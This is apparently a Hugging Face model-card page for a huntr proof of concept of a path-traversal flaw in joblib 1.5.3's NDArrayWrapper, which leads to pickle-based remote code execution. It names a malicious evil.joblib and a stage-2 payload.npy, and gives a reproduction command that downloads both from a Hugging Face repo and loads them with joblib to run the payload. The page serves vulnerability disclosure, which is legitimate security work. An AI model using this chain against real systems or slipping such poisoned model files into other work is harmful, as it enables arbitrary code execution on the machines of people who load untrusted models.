joblib NDArrayWrapper Path Traversal PoC
Security research PoC for huntr MFV submission.
Vulnerability: NDArrayWrapper.read() in joblib/numpy_pickle_compat.py uses an unsanitized
self.filename field (from inside the pickle) in os.path.join(), then calls
numpy.load(filename, allow_pickle=True) โ enabling path traversal to arbitrary pickle execution.
Affected version: joblib 1.5.3 (latest)
Files
evil.joblibโ malicious model file (NDArrayWrapper withfilename="../payload.npy")payload.npyโ stage-2 RCE pickle (place one directory above evil.joblib)
Reproduction
pip3 install joblib==1.5.3 numpy
python3 -c "
import os, joblib
from huggingface_hub import hf_hub_download
os.makedirs('/tmp/poc_model', exist_ok=True)
hf_hub_download('th3-j0k3r/joblib-ndarray-poc', 'payload.npy', local_dir='/tmp')
hf_hub_download('th3-j0k3r/joblib-ndarray-poc', 'evil.joblib', local_dir='/tmp/poc_model')
try: joblib.load('/tmp/poc_model/evil.joblib')
except: pass
print(open('/tmp/jl_rce_proof.txt').read().strip())
"
Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐ Ask for provider support